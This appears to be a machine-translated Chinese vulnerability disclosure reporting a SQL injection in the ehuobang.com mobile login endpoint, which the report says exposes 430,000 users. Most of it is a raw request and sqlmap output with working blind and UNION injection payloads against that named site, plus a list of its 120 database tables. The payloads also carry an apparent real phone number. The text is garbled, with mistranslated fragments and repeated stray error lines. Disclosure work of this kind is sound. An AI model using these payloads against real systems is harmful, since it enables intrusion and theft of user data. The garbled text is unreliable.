漏洞标题 饥饿的货物帮助一个站存在sql注入涉及43万用户的个人详细信息 相关制造商 Ehuobang.com 漏洞作者 过路人 提交时间 2016-05-03 18: 05 公共时间 2016-06-17 18: 30 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 20 漏洞状态 制造商已确认 标签标签 漏洞详细信息 注射点: POSThttps://m.ehuobang.com/app/ajax/user.php?action=logintel HTTP/1.1 主机: m.ehuobang.com 代理连接:保持活动状态 内容长度: 77 接受: text/plain,*/*; Q=0.01 来源:http://m.ehuobang.com X-Requested-With: XMLHttpRequest 用户代理: Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/537.36(KHTML,与Gecko一样)Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0 内容类型: application/x-www-form-urlencoded;字符集=UTF-8 Failure when receiving data from the peer 地方,州和联邦法律。开发人员不承担任何责任,也不承担责任 对于此程序造成的任何误用或损坏,应使用Sible [*]从15:开始38: 40 [15: 38: 40] [INFO]从'q1.txt'解析HTTP请求 [15: 38: 40] [INFO]测试与目标URL的连接 [15: 38: 43] [INFO]启发式检测到网页字符集'ascii' Sqlmap从存储的会话:恢复以下注入点 --- 参数: tel(POST) 输入:基于布尔值的盲 标题: AND基于布尔的盲 - WHERE或H * ING子句 有效载荷: tel=13299417924 AND 6228=6228& pwd=as123。& bkurl=http://m.ehuobang.co 米/网络/my.html&安培;随机=296 输入:和/或基于时间的盲 标题: MySQL>=5.0.12 AND基于时间的盲(SELECT) 有效载荷: tel=13299417924 AND(SELECT * FROM(SELECT(SLEEP(5)))hvXD)& pwd=as12 3.& bkurl=http://m.ehuobang.com/web/my.html&random=296 键入: UNION查询 标题:通用UNION查询(NULL) - 1列 有效载荷: tel=-4028 UNION ALL SELECT CONCAT(0x71766a7a71,0x4a656363586f554445 52,0x7171787071) - & pwd=as123。& bkurl=http://m.ehuobang.com/web/my.html&random=29 6 --- < /代码> 120张 数据库: ehuobangcom [120表] + ------------------------- + | cms_admins | | list_menu | Failure when receiving data from the peer | tb_friend_invite | | tb_friend_rank | | tb_friend_weixin_iphone | | tb_friend_yd_invite | | tb_fruit | | tb_fruit_logs | | tb_fruit_opportunity | | tb_fruit_phone | | tb_group_lottery | | tb_group_lottery_result | | tb_groups | | tb_groups_detail | | tb_groups_pics | | tb_imcome | | tb_income_detail | | tb_index_base | | tb_ios_update | | tb_live | | tb_live_comment | | tb_live_zan | | tb_lottery_friend | | tb_lottery_logs | | tb_lottery_share | | tb_lottry_record | | tb_match_click | | tb_match_product | | tb_match_vote | | tb_match_weixin | | tb_message | | tb_new_class | | tb_news | | tb_news_profit | | tb_news_read | | tb_order_cart | | tb_order_list | | tb_order_service | | tb_order_service_detail | | tb_order_service_log | | tb_orders_notice | | tb_parent_order | | tb_partner | | tb_pay_back_record | | tb_products | | tb_products_tags | | tb_products_yeargoods | | tb_profit | | tb_profit_pic | | tb_promote | | tb_promote_log | | tb_province | | tb_recharge | | tb_settle | | tb_settle_detail | | tb_sms_recode | | tb_temp_xls | | tb_tongji_list | | tb_union_api_log | | tb_union_golog | | tb_union_goshop | | tb_union_notice_log | | tb_union_order | | tb_union_push_log | | tb_union_word | | tb_upload_orders | | tb_user_account | | tb_user_code | | tb_user_record | | tb_user_vip | | tb_users | | tb_users_carriage | | tb_users_carriage_rule | | tb_users_certificates | | tb_users_forbit | | tb_vip_top_products | | tb_vip_user_count | | tb_wl | | tb_wl_code | | tb_wl_fail | | tb_wl_list | | tb_wl_poll | | tb_wl_print | | tb_wl_printoffset | | tb_wl_template | | tb_xg_result | | tb_yuandan_pic | | tb_zt_class | | tb_zwd_money | 430,000 +用户表: 数据库: ehuobangcom Failure when receiving data from the peer